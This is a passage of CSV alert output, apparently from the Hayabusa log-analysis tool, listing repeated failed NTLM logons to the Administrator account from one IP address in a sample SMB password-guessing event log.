+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: 